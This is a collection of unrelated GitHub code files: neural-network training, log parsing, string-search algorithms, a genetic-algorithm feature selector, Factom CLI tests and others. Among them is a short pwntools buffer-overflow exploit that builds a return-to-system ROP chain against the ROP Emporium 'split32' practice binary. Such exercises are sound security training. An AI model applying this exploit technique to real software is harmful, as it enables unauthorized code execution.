acc_train = self.accuracy(train_dataset)\n acc_train_array.append(acc_train)\n print('Accuracy (train): {}'.format(acc_train))\n if monitor_ce_eval:\n ce_eval = self.ce(eval_dataset)\n ce_eval_array.append(ce_eval)\n print('CE (eval): {}'.format(ce_eval))\n if monitor_accuracy_eval:\n acc_eval = self.accuracy(eval_dataset)\n acc_eval_array.append(acc_eval)\n print('Accuracy (eval): {}'.format(acc_eval))\n\n if monitor_plot:\n fig, ax = plt.subplots(nrows=1, ncols=2, figsize=(9, 4))\n line1, = ax[0].plot(ce_train_array, '--', linewidth=2, label='ce_train')\n line2, = ax[0].plot(ce_eval_array, label='ce_eval')\n\n line3, = ax[1].plot(acc_train_array, '--', linewidth=2, label='acc_train')\n line4, = ax[1].plot(acc_eval_array, label='acc_eval')\n\n ax[0].legend(loc='upper right')\n ax[1].legend(loc='upper left')\n ax[1].set_ylim([0, 1])\n\n plt.savefig(monitor_plot)\n\n def online_SGD(self, dataset):\n \"\"\"\n Task 2d\n This function trains the network in an online fashion. Meaning the weights are updated after each observation.\n :param dataset:\n :return: None\n \"\"\"\n dataset = dataset.get_all_obs_class(True)\n for item in dataset:\n output = self.forward(item[0])\n error_signal = output - item[1]\n for i in range(len(self.ls), -1, -1):\n gradients_weight, gradients_bias, error_signal = self.layers[i].backprop(error_signal)\n self.layers[i].weights = self.layers[i].weights - self.lr * gradients_weight\n self.layers[i].biases = self.layers[i].biases - self.lr * gradients_bias\n\n\n def mini_batch_SGD(self, dataset):\n \"\"\"\n Task 2d\n This function trains the network using mini batches. 
The weight updates are accumulated over a whole mini batch and applied once, using the batch-averaged error signal.\n        :param dataset:\n        :return: None\n        \"\"\"\n        mini_batches = dataset.get_mini_batches(self.mbs)\n        for item in mini_batches:\n            error_signal = 0\n            # the last batch may be smaller than self.mbs, so iterate over its actual size\n            for i in range(len(item[0])):\n                output = self.forward(item[0][i])\n                error_signal += output - item[1][i]\n            error_signal = error_signal / self.mbs\n            for k in range(len(self.ls), -1, -1):\n                gradients_weight, gradients_bias, error_signal = self.layers[k].backprop(error_signal)\n                self.layers[k].weights = self.layers[k].weights - self.lr * gradients_weight\n                self.layers[k].biases = self.layers[k].biases - self.lr * gradients_bias\n\n    def constructNetwork(self):\n        \"\"\"\n        Task 2d\n        uses self.ls, self.ni and self.no to construct the list of layers. The last layer uses the softmax activation; all preceding layers use sigmoid.\n        :return: None\n        \"\"\"\n        l = Layer(self.ni, self.ls[0], sigmoid, self.type)\n        self.layers.append(l)\n        for i in range(1, len(self.ls)):\n            l = Layer(self.ls[i - 1], self.ls[i], sigmoid)\n            self.layers.append(l)\n        l = Layer(self.ls[len(self.ls) - 1], self.no, softmax)\n        self.layers.append(l)\n\n    def ce(self, dataset):\n        ce = 0\n        for x, t in dataset:\n            t_hat = self.forward(x)\n            ce += np.sum(np.nan_to_num(-t * np.log(t_hat) - (1 - t) * np.log(1 - t_hat)))\n        return ce / dataset.num_obs\n\n    def accuracy(self, dataset):\n        # np.int was removed from NumPy; the builtin int is the correct dtype here\n        cm = np.zeros(shape=[dataset.num_classes, dataset.num_classes], dtype=int)\n        for x, t in dataset:\n            t_hat = self.forward(x)\n            c_hat = np.argmax(t_hat)  # index of largest output value\n            c = np.argmax(t)\n            cm[c, c_hat] += 1\n\n        correct = np.trace(cm)\n        return correct / dataset.num_obs\n\n    def load(self, path=None):\n        if not path:\n            path = './network.save'\n        with open(path, 'rb') as f:\n            self.layers = pickle.load(f)\n\n    def save(self, path=None):\n        if not path:\n            path = './network.save'\n        with open(path, 'wb') as f:\n            pickle.dump(self.layers, f)\n","repo_name":"iFocusing/BasicNeuralNetwork","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":14547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"36396601430","text":"from collections import defaultdict\nimport reverse_geocoder as rg\nuid = ''\nbuffer_query = ''\nfirst_char = ''\nlocal = ''\ngps = ''\nline_buf = ''\nrussian_query = defaultdict(int)\nenglish_query = defaultdict(int)\nquery_in_russia = []\ndef is_ru(buf):\n    if buf.find('ru') != -1:\n        return True\n    else:\n        return False\ndef find_country(coordinates):\n    ans = rg.search(coordinates, mode=1)\n    return ans[0]['cc']\n\ndef is_query(log, first_char, uid):\n    if log[-1] != uid and uid != '':\n        return True\n    if log[0][1] != first_char and first_char != '':\n        return True\n    return False\nwith open(\"test.txt\") as f:\n    for line in f:\n        log = list(line.split(';'))\n        b = gps.replace('[', '').replace(']', '')\n        coordinates = list(reversed((b.split(','))))\n        if is_query(log, first_char, uid) and len(buffer_query) > 4:\n            if is_ru(local):\n                russian_query[buffer_query] += 1\n            if not is_ru(local):\n                english_query[buffer_query] += 1\n            if gps != \"None\" and gps != '':\n                if find_country(coordinates) == \"RU\":\n                    query_in_russia.append(buffer_query)\n        buffer_query = log[0]\n        local = log[2]\n        gps = log[3]\n        uid = log[-1]\n        first_char = log[0][1]\n        log.clear()\n        line_buf = line\nprint(sorted(dict(russian_query).items(), key = lambda x : x[1], reverse = 
True))\nprint(sorted(dict(english_query).items(), key = lambda x : x[1], reverse = True))\nprint(query_in_russia)\n","repo_name":"razdenand/Python_apps","sub_path":"Parser_logs/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28336882687","text":"import numpy as np\nnp.set_printoptions(precision=4)\nimport pickle\nimport pdb\nimport math\nimport csv\n\n\ndef get_data_stats():\n data = pickle.load(open('data.pkl','rb'))\n\n stats = []\n avg_stats = []\n \n time_identical = {}\n time_reverse = {}\n\n for sub in data:\n time_identical[sub] = []\n time_reverse[sub] = []\n\n time = []\n for sub in data:\n \n total = {'1':0 , '3': 0, '5': 0}\n correct_first = {'1':0 , '3': 0, '5': 0}\n correct_first_i = {'1':0 , '3': 0, '5': 0}\n correct_first_r = {'1':0 , '3': 0, '5': 0}\n incorrect_first_i = {'1':0 , '3': 0, '5': 0}\n incorrect_first_r = {'1':0 , '3': 0, '5': 0}\n incorrect_second_correct_first_i = {'1':0 , '3': 0, '5': 0}\n incorrect_second_correct_first_r = {'1':0 , '3': 0, '5': 0}\n correct_second_incorrect_first_i = {'1':0 , '3': 0, '5': 0}\n correct_second_incorrect_first_r = {'1':0 , '3': 0, '5': 0}\n \n \n for trial in data[sub]:\n for pair in data[sub][trial]:\n\n datum = data[sub][trial][pair]\n reps = datum['xREPS']\n total[reps] += 1\n\n if datum['ANSWER1'] == 'C':\n correct_first[reps] += 1\n\n if ('B1' in datum and 'B2' in datum) or ('F1' in datum and 'F2' in datum):\n identical = 1\n else:\n identical = 0\n\n\n if datum['ANSWER1'] == 'C' and identical:\n correct_first_i[reps] += 1\n elif datum['ANSWER1'] == 'C' and not identical:\n correct_first_r[reps] += 1\n elif datum['ANSWER1'] != 'C' and identical:\n incorrect_first_i[reps] += 1\n elif datum['ANSWER1'] != 'C' and not identical:\n incorrect_first_r[reps] += 1\n \n if datum['ANSWER1'] == 'C' and datum['ANSWER2'] != 'C':\n if identical:\n incorrect_second_correct_first_i[reps] += 1\n else:\n incorrect_second_correct_first_r[reps] += 1\n\n if datum['ANSWER1'] != 'C' and datum['ANSWER2'] == 'C':\n if identical:\n correct_second_incorrect_first_i[reps] += 1\n else:\n correct_second_incorrect_first_r[reps] += 1\n\n if datum['ANSWER1'] == 'C' and datum['ANSWER2'] == 'C':\n if identical:\n if 'F1' in datum:\n if int(datum['F1']) > 6000 or int(datum['F2'])> 6000:\n continue\n time_identical[sub].append(int(datum['F1'])-int(datum['F2']))\n else:\n if int(datum['B1']) > 6000 or int(datum['B2'])> 6000:\n continue\n time_identical[sub].append(int(datum['B1'])-int(datum['B2']))\n else:\n if 'F1' in datum:\n if int(datum['F1']) > 6000 or int(datum['B2'])> 6000:\n continue\n time_reverse[sub].append(int(datum['F1'])-int(datum['B2']))\n else:\n if int(datum['B1']) > 6000 or int(datum['F2'])> 6000:\n continue\n time_reverse[sub].append(int(datum['B1'])-int(datum['F2']))\n \n stats.append(list(correct_first.values()) + list(incorrect_second_correct_first_i.values()) + list(correct_second_incorrect_first_i.values()) + list(incorrect_second_correct_first_r.values()) + list(correct_second_incorrect_first_r.values()) + list(correct_first_i.values()) + list(correct_first_r.values()) + list(incorrect_first_i.values()) + list(incorrect_first_r.values() ))\n\n avg_stats.append([sum(list(correct_first.values())), \\\n sum(list(incorrect_second_correct_first_i.values())), \\\n sum(list(correct_second_incorrect_first_i.values())), \\\n sum(list(incorrect_second_correct_first_r.values())), \\\n 
sum(list(correct_second_incorrect_first_r.values())), \\\n                          sum(list(correct_first_i.values())), \\\n                          sum(list(correct_first_r.values())), \\\n                          sum(list(incorrect_first_i.values())), \\\n                          sum(list(incorrect_first_r.values()))])\n\n\n    avg_stats = np.array(avg_stats).astype(float)\n    count_stats = avg_stats.copy()\n\n    incorrect_2_correct_1_i = avg_stats[:,1]/avg_stats[:,-4]\n    correct_2_incorrect_1_i = avg_stats[:,2]/(avg_stats[:,-2])\n    incorrect_2_correct_1_r = avg_stats[:,3]/avg_stats[:,-3]\n    correct_2_incorrect_1_r = avg_stats[:,4]/(avg_stats[:,-1])\n\n    avg_stats[:,1] = avg_stats[:,1]/avg_stats[:,-4]\n    avg_stats[:,2] = avg_stats[:,2]/(avg_stats[:,-2])\n    avg_stats[:,3] = avg_stats[:,3]/avg_stats[:,-3]\n    avg_stats[:,4] = avg_stats[:,4]/(avg_stats[:,-1])\n    avg_stats[:,0] = avg_stats[:,0]/72\n    avg_stats[:,5] = avg_stats[:,5]/36\n    avg_stats[:,6] = avg_stats[:,6]/36\n    avg_stats[:,7] = avg_stats[:,7]/36\n    avg_stats[:,8] = avg_stats[:,8]/36\n\n    difference_i = incorrect_2_correct_1_i - correct_2_incorrect_1_i\n    difference_r = incorrect_2_correct_1_r - correct_2_incorrect_1_r\n\n    t_r = np.mean(difference_r)/(np.std(difference_r)/math.sqrt(15))\n    t_i = np.mean(difference_i)/(np.std(difference_i)/math.sqrt(15))\n\n    time_diff_identical = []\n    time_diff_reverse = []\n    for sub in data:\n        time_diff_identical.append(np.mean(time_identical[sub]))\n        time_diff_reverse.append(np.mean(time_reverse[sub]))\n\n    time_data = [np.mean(time_diff_identical), np.mean(time_diff_reverse), np.std(time_diff_identical), np.std(time_diff_reverse)]\n    pickle.dump(avg_stats, open('accuracies_data.pkl', 'wb'))\n    pickle.dump(time_data, open('time_diff_data.pkl', 'wb'))\n    with open('data_acc.csv', 'a+') as csvfile:\n        datawriter = csv.writer(csvfile, delimiter=',')\n        datawriter.writerow(['Data'])\n        datawriter.writerow(['correct_first', 'incorrect_second_correct_first_i', 'correct_second_incorrect_first_i', 'incorrect_second_correct_first_r', 'correct_second_incorrect_first_r', 'correct_first_i', 'correct_first_r', 'incorrect_first_i', 'incorrect_first_r'])\n\n    for i in range(len(avg_stats)): \n        with open('data_acc.csv', 'a+') as csvfile:\n            datawriter = csv.writer(csvfile, delimiter=',')\n            avg_stats[i] = [round(x,2) for x in avg_stats[i]]\n            datawriter.writerow(avg_stats[i])\n\n    return avg_stats, time_data\n\n\nif __name__ == \"__main__\" :\n    stats = get_data_stats()\n    print(stats)\n","repo_name":"asneha213/paired-associate-learning","sub_path":"analyze_data.py","file_name":"analyze_data.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28434683019","text":"arquivo = open(\"1.txt\", \"r\")\n\nnome = input(\"Enter a student name to search for: \")\nnomes = arquivo.read()\n# single membership test against the whole file; the original looped over\n# every character of the file and printed one result per character\nif nome.lower() in nomes.lower():\n    print(\"The student is enrolled\")\nelse:\n    print(\"Student not enrolled\")\n\narquivo.close()\n","repo_name":"ggmacedo/aprendendopython","sub_path":"aula11/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1922876919","text":"import time\n\n\ndef naive(text, pattern):\n    start = time.time()\n\n    n = len(text)\n    m = len(pattern)\n\n    res_pos = []\n\n    # n - m + 1 candidate start positions (the original used n - m - 1\n    # and missed the last two alignments)\n    for i in range(n - m + 1):\n        if text[i:(i+m)] == pattern:\n            res_pos.append(i)\n\n    stop = time.time()\n    return res_pos, stop - start\n\n\ndef rabin_karp(text, pattern, d, q):\n\n    n = len(text)\n    m = 
len(pattern)\n p = 0\n t = 0\n\n result = []\n\n h = pow(d, m - 1) % q\n for i in range(m):\n p = (d*p + ord(pattern[i])) % q\n t = (d*t + ord(text[i])) % q\n\n start = time.time()\n\n for s in range(n - m + 1):\n if p == t:\n if text[s:s+m] == pattern:\n result.append(s)\n\n if s < n - m:\n t = (d * (t-ord(text[s])*h) + ord(text[s+m])) % q\n\n stop = time.time()\n return result, stop - start\n\n\ndef rb1(text, pattern, d):\n pows = [1]\n for i in range(1, len(text)):\n pows.append(pows[i - 1] * d)\n\n\ndef get_prefixs(pattern):\n m = len(pattern)\n pi = [0]\n\n for i in range(1, m):\n k = pi[i - 1]\n while k > 0 and pattern[k] != pattern[i]:\n k = pi[k - 1]\n if pattern[k] == pattern[i]:\n k += 1\n pi.append(k)\n\n return pi\n\n\ndef kmp(text, pattern):\n start = time.time()\n\n n = len(text)\n m = len(pattern)\n q = 0\n results = []\n\n pi = get_prefixs(pattern)\n\n for i in range(n):\n while q > 0 and pattern[q] != text[i]:\n q = pi[q]\n if pattern[q] == text[i]:\n q += 1\n if q == m:\n results.append(i - m + 1)\n q = pi[q - 1]\n\n stop = time.time()\n return results, stop - start\n","repo_name":"MikhailMurashov/Find_substring","sub_path":"algs.py","file_name":"algs.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17402750838","text":"from goingspare.utils import render_to_response_context\nfrom django.db import transaction\n\n@transaction.commit_on_success\ndef index(request):\n userprofile = request.user.get_profile()\n notifications = request.user.get_profile().notification_set.all()\n notifications.filter(read=False).update(read=True)\n return render_to_response_context(request,\n 'notifications/index.html',\n {'notifications': notifications})\n","repo_name":"Joeboy/django-sharestuff","sub_path":"goingspare/notifications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"28051869039","text":"###########################\n## ROUTE TYPE STATISTICS ##\n###########################\n\n# Purpose: Compute the percentage of each route type that is present in a\n# GTFS dataset and print results to the console\n\n# Load required libraries\nimport arcpy\nimport numpy as np\nimport SSDataObject as ssdo\n\n# Set inputs and outputs\ninFC = 'mpls_stpaul_shapes_projected'\noutFC = 'mpls_stpaul_shapes_projected_dissolved'\n\n# Need to dissolve on route_type alone to avoid double-counting parts of the\n# networks where multiple routes use the same road/rail infrastructure\nDissolve_management(\n inFC,\n outFC,\n dissolve_field = [\"route_type\"],\n statistics_fields = [[\"OBJECTID\", \"COUNT\"], [\"route_id\", \"COUNT\"]],\n multi_part = \"MULTI_PART\",\n unsplit_lines = \"DISSOLVE_LINES\"\n)\n\n# Convert output feature class to a spatial statistics data object\n# so we can perform pandas data manipulation on it\ndataobject = ssdo.SSDataObject(outFC)\n\n#dataobject.allFields # show available fields\ndataobject.obtainData(dataobject.oidName, ['ROUTE_TYPE', 'SHAPE_LENGTH'])\ndf = dataobject.getDataFrame()\n\n# Get total length of transit infrastructure\ntotal_length = df['SHAPE_LENGTH'].sum()\nprint(\"TOTAL LENGTH: \" + str(total_length))\n\n# Compute percent of total that each route type represents\ndf['PERCENT'] = df['SHAPE_LENGTH'] / total_length * 
100\n\nprint(df)\n","repo_name":"linkalis/GTFS_analysis_scripts","sub_path":"route_type_stats.py","file_name":"route_type_stats.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32293805","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 26 19:16:16 2019\n\n@author: Jolin\n\"\"\"\n\nimport random\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import roc_auc_score\nimport pandas as pd\n\ndef ga_main(kfold,x_train_s,y_train_s,x_val,y_val):\n population_size=10\n chromosome_length=14\n cof=['age_interval','admission_type_EMERGENCY','admission_type_ELECTIVE','admission_type_URGENT','aids','hem','mets']\n stats_list=['min','max','minmax','mean','std','stdmean','median','qua25','qua75','qua2575','mode','skew','kurt','first']\n pc=0.6\n pm=0.1\n population=pop=species_origin(population_size=population_size,chromosome_length=chromosome_length) \n now_best_indiv=list() #迄今为止最好的个体\n now_best_fitness=[random.random()*5 for _ in range(50)] #迄今为止最好的适应度\n all_best_fitness=list() #存储每一代最好的适应度\n all_best_indiv=list() #存储每一代最好的个体\n n=1;\n f_res_n=[]\n f_res_nowbest=[]\n f=open(r'E:/lml_dataget/v3/random80/guocheng_'+str(kfold)+'.txt','a',encoding='utf-8')\n while (np.std(now_best_fitness[-50:])>0.001):\n #计算种群的适应度\n function1=function(population=population,x_train_s=x_train_s,y_train_s=y_train_s,x_val=x_val,y_val=y_val,cof=cof,stats_list=stats_list)\n fitness1=fitness(function1)\n #求种群中最好的个体以及对应的适应度值\n best_individual,best_fitness=best(population,fitness1)\n all_best_indiv.append(best_individual)\n all_best_fitness.append(best_fitness)\n nowbestfit=max(all_best_fitness)\n nowbestindv=all_best_indiv[all_best_fitness.index(max(all_best_fitness))]\n now_best_fitness.append(nowbestfit)\n now_best_indiv.append(nowbestindv) \n f.write('----------第'+str(n)+'次的结果--------------'+':::'+str([best_individual,best_fitness])+'\\n')\n f.write('----------目前最好的结果--------------'+':::'+str([nowbestindv,nowbestfit])+'\\n')\n print('----------第'+str(n)+'次的结果--------------'+'\\n')\n print(str([best_individual,best_fitness]));\n print('----------目前最好的结果--------------'+'\\n')\n print(str([nowbestindv,nowbestfit]));\n f_res_n.append([n,best_individual,best_fitness])\n f_res_nowbest.append([n,nowbestindv,nowbestfit])\n selection(population,fitness1,pop)#选择\n crossover(population,pc,pop)#交配\n mutation(population,pm)#变异\n n=n+1;\n if(n>300):\n break;\n f_res_n_df=pd.DataFrame(f_res_n,columns=['no','best_individual','best_fitness'])\n f_res_nowbest_df=pd.DataFrame(f_res_nowbest,columns=['no','best_individual_now','best_fitness_now'])\n f_res_n_df.to_csv(r'E:\\lml_dataget\\v3\\random80\\\\'+str(kfold)+'_flod_res.csv',index=False,encoding='utf-8-sig')\n f_res_nowbest_df.to_csv(r'E:\\lml_dataget\\v3\\random80\\\\'+str(kfold)+'_flod_res_nowbest.csv',index=False,encoding='utf-8-sig')\n f.close()\n return [f_res_n,f_res_nowbest]\n\ndef species_origin(population_size,chromosome_length): \n population=[[]] \n while(len(population)<=population_size):\n temporary=[]\n for j in range(chromosome_length): \n temporary.append(random.randint(0,1))\n# if(sum(temporary)==7):\n population.append(temporary) \n #将染色体添加到种群中 \n return population[1:]\n \ndef function(population,x_train_s,y_train_s,x_val,y_val,cof,stats_list):\n function1=[]\n coff=cof\n for ii in range(len(population)):\n indiv=population[ii]\n id1 = [i for i,x in enumerate(indiv) if x==1]\n stats=[stats_list[i] for i in id1]\n 
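# (added note) id1 holds the indices of the 1-bits in the chromosome indiv,\n        # so each individual keeps a subset of the statistics in stats_list,\n        # e.g. indiv = [1, 0, 1, 0, ...] selects 'min' and 'minmax'. Added sanity check:\n        assert all(s in stats_list for s in stats)\n        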
for sts in stats:\n for column in x_train_s.columns:\n if(sts == column.split('_')[0]):\n coff.append(column)\n \n x_train_ss=pd.DataFrame(x_train_s,columns=x_train_s.columns)[coff]\n y_train_ss=y_train_s\n x_vall=x_val[coff]\n y_vall=y_val\n \n rf=RandomForestClassifier(random_state=42,n_estimators=50)\n rf.fit(x_train_ss,y_train_ss)\n preds_rf=rf.predict_proba(x_vall)\n res=roc_auc_score(y_vall,preds_rf[:,1])\n function1.append(res*100)\n return function1\n \ndef fitness(function1):\n fitness1=[]\n mf=0\n for i in range(len(function1)):\n if(function1[i]+mf>0):\n temporary=mf+function1[i]\n else:\n temporary=0.0\n # 如果适应度小于0,则定为0\n fitness1.append(temporary)\n #将适应度添加到列表中\n return fitness1\n \n #计算适应度和\ndef sum(fitness1):\n total=0\n for i in range(len(fitness1)):\n total+=fitness1[i]\n return total\n \n #计算适应度斐波纳挈列表,这里是为了求出累积的适应度\ndef cumsum(fitness1):\n for i in range(len(fitness1)-2,-1,-1):\n # range(start,stop,[step])\n # 倒计数\n total=0\n j=0\n while(j<=i):\n total+=fitness1[j]\n j+=1\n #这里是为了将适应度划分成区间\n fitness1[i]=total\n fitness1[len(fitness1)-1]=1\n \n #3.选择种群中个体适应度最大的个体\ndef selection(population,fitness1,pop):\n new_fitness=[]\n #单个公式暂存器\n total_fitness=sum(fitness1)\n #将所有的适应度求和\n for i in range(len(fitness1)):\n new_fitness.append(fitness1[i]/total_fitness)\n #将所有个体的适应度概率化,类似于softmax\n cumsum(new_fitness)\n #将所有个体的适应度划分成区间\n ms=[]\n #存活的种群\n pop_len=len(population)\n #求出种群长度\n #根据随机数确定哪几个能存活\n \n for i in range(pop_len):\n ms.append(random.random())\n # 产生种群个数的随机值\n ms.sort()\n # 存活的种群排序\n fitin=0\n newin=0\n new_pop=population\n \n #轮盘赌方式\n while newinbestfitness):\n \n bestfitness=fitness1[i]\n bestindividual=population[i]\n \n return [bestindividual,bestfitness]\n ","repo_name":"MenglinLu/Patient-representation-based-on-statistics","sub_path":"model/ga_1.py","file_name":"ga_1.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"32158810403","text":"from pwn import *\n\nt = process(\"./split32\")\n\ngdb_cmd = [\"c\"] # \"b *0x08048653\"\n\ncontext.terminal = [\"gnome-terminal\", \"-e\"]\ngdb.attach(t, gdbscript='\\n'.join(gdb_cmd))\n\nsystem_plt_address = 0x08048430\ncat_flag_address = 0x0804a030\n# buf = cyclic(120, n=4)\noffset = cyclic_find(\"laaa\", n=4)\nprint(offset)\nbuf = \"A\"*offset\nbuf += p32(system_plt_address)\nbuf += \"B\"*4\nbuf += p32(cat_flag_address)\n\nt.recvuntil('\\n>')\nt.sendline(buf)\n\nt.interactive()","repo_name":"wr47h/ROP-Emporium-Solutions","sub_path":"split/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23201530043","text":"# Checking hash of a file\r\nimport hashlib\r\n\r\npublished_hash = '9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2'\r\n\r\nfilename = 'colorama-0.4.4-py2.py3-none-any.whl'\r\n\r\nwith open(filename, 'rb') as downloaded_file:\r\n contents = downloaded_file.read()\r\n\r\nfile_hash = hashlib.sha256(contents).hexdigest()\r\nprint(file_hash == published_hash)\r\n","repo_name":"adexstack/tim-python","sub_path":"BinaryFiles/sha_checksum.py","file_name":"sha_checksum.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16240864597","text":"import unittest, os, time\n\nfrom nose.plugins.attrib import attr\nfrom api_objects.api_objects_factomd import APIObjectsFactomd\nfrom 
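# --- added illustrative aside, not part of the original exploit ---\n# Classic 32-bit ret2system layout: padding up to the saved return address,\n# then system@plt, a dummy return address, then the address the script calls\n# cat_flag_address (presumably a \"/bin/cat flag.txt\" string in the binary).\n# p32() packs a 32-bit little-endian value, same as the stdlib equivalent:\nimport struct\nassert struct.pack('<I', 0x08048430) == b'\\x30\\x84\\x04\\x08'  # system@plt\n# -------------------------------------------------------------------\n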
cli_objects.cli_objects_chain import CLIObjectsChain\nfrom cli_objects.cli_objects_create import CLIObjectsCreate\nfrom cli_objects.cli_objects_identity_wallet import CLIObjectsIdentityWallet\nfrom helpers.helpers import create_random_string, read_data_from_json\nfrom helpers.general_test_methods import wait_for_ack, wait_for_chain_in_block, fund_entry_credit_address, wait_for_entry_in_block\n\n@attr(fast=True)\nclass CLITestsIdentityWallet(unittest.TestCase):\n cli_chain = CLIObjectsChain()\n cli_create = CLIObjectsCreate()\n cli_identity = CLIObjectsIdentityWallet()\n api_factomd = APIObjectsFactomd()\n data = read_data_from_json('shared_test_data.json')\n blocktime = api_factomd.get_current_minute()['directoryblockinseconds']\n\n TIME_TO_WAIT = 5\n\n\n def test_list_all_identity_keys(self):\n newkey = self.cli_identity.new_identity_key()\n keylist = (self.cli_identity.list_identity_keys()).split()\n self.assertTrue(newkey in keylist, \"Testcase Failed\")\n\n def test_rm_identity_keys(self):\n newkey = self.cli_identity.new_identity_key()\n self.cli_identity.rm_identity_key(newkey)\n keylist = (self.cli_identity.list_identity_keys()).split()\n self.assertFalse(newkey in keylist, \"Testcase Failed\")\n\n def test_make_chain_and_check_chainhead(self):\n chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(chainid)\n\n def compose_identity_chain(self):\n self.entry_credit_address100 = fund_entry_credit_address(100)\n data = create_random_string(1024).encode()\n path = os.path.join(os.path.dirname(__file__), self.data['test_file_path'])\n name_1 = create_random_string(5)\n name_2 = create_random_string(5)\n names_list = ['-n', name_1, '-n', name_2]\n chain_flag_list = ['-f', '-C']\n key1 = self.cli_identity.new_identity_key()\n key2 = self.cli_identity.new_identity_key()\n key3 = self.cli_identity.new_identity_key()\n key_list = ['-k',key1,'-k', key2, '-k', key3]\n\n\n chainid = self.cli_identity.add_identity_chain(self.entry_credit_address100, data, flag_list= chain_flag_list, external_id_list=names_list,\n public_key_list=key_list)\n return chainid\n\n def make_chain(self):\n self.entry_credit_address100 = fund_entry_credit_address(100)\n data = create_random_string(1024)\n path = os.path.join(os.path.dirname(__file__), self.data['test_file_path'])\n name_1 = create_random_string(5)\n name_2 = create_random_string(5)\n names_list = ['-n', name_1, '-n', name_2]\n chain_flag_list = ['-f', '-C']\n chainid = self.cli_chain.make_chain(self.entry_credit_address100, data, external_id_list=names_list, flag_list=chain_flag_list)\n return chainid\n\n def confirm_chain_in_blockchain(self,chainid):\n found = False\n for x in range(0, self.TIME_TO_WAIT):\n if 'Chain not yet included in a Directory Block' in self.cli_chain.get_allentries(chain_id=chainid):\n found = True\n break\n time.sleep(1)\n self.assertTrue(found, 'Chainhead is missing')\n for x in range(0, self.blocktime):\n if 'Chain not yet included in a Directory Block' not in self.cli_chain.get_allentries(chain_id=chainid):\n found = True\n break\n time.sleep(1)\n self.assertTrue(found, 'Chainhead not included in a Directory Block after 1 block')\n\n def test_compose_attribute(self):\n '''\n Create a new Identity Attribute Entry using the Entry Credits from the specified address. Optional output flags: -C ChainID. -E EntryHash. 
-T TxID.\n '''\n chainid = self.make_chain()\n self.confirm_chain_in_blockchain(chainid)\n receiver_chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(receiver_chainid)\n self.entry_credit_address100 = fund_entry_credit_address(100)\n self.heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(self.heights)['DirectoryBlockHeight']\n self.keys = self.cli_identity.get_keys_at_height(receiver_chainid,directory_block_height)\n signerkey = self.cli_chain.parse_keys_data(self.keys,0)\n signer_chainid = receiver_chainid\n attributes = \"\\'[{\\\"key\\\": \\\"email\\\", \\\"value\\\": \\\"veena@abc.com\\\"}]\\'\"\n\n entry_text = self.cli_identity.add_attribute(chainid, receiver_chainid, signer_chainid, signerkey, attributes, self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n wait_for_entry_in_block(entry_hash,chainid)\n\n self.assertIn('DBlockConfirmed',\n str(self.api_factomd.get_status(entry_hash,chainid)),\n 'Entry not arrived in block')\n\n def test_compose_attribute_endorsement(self):\n '''\n Create a new Endorsement Entry for the Identity Attribute at the given entry hash. Uses the Entry Credits from the specified address. Optional output flags: -C ChainID. -E EntryHash. -T TxID.\n '''\n\n #compose attribute\n chainid = self.make_chain()\n self.confirm_chain_in_blockchain(chainid)\n receiver_chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(receiver_chainid)\n self.entry_credit_address100 = fund_entry_credit_address(100)\n self.heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(self.heights)['DirectoryBlockHeight']\n self.keys = self.cli_identity.get_keys_at_height(receiver_chainid,directory_block_height)\n signerkey = self.cli_chain.parse_keys_data(self.keys,0)\n signer_chainid = receiver_chainid\n attributes = \"\\'[{\\\"key\\\": \\\"email\\\", \\\"value\\\": \\\"veena@abc.com\\\"}]\\'\"\n\n entry_text = self.cli_identity.add_attribute(chainid, receiver_chainid, signer_chainid, signerkey, attributes, self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n\n #compose attribute endorsement\n entry_text = self.cli_identity.add_attribute_endorsement(chainid,signer_chainid,signerkey,entry_hash,self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n wait_for_entry_in_block(entry_hash,chainid)\n self.assertIn('DBlockConfirmed',\n str(self.api_factomd.get_status(entry_hash,chainid)),\n 'Entry not arrived in block')\n\n def test_key_replacement(self):\n '''\n Create a new Identity Key Replacement Entry using the Entry Credits from the specified address. The oldkey is replaced by the newkey, and signerkey (same or higher priority as oldkey) authorizes the replacement. Optional output flags: -C ChainID. -E EntryHash. 
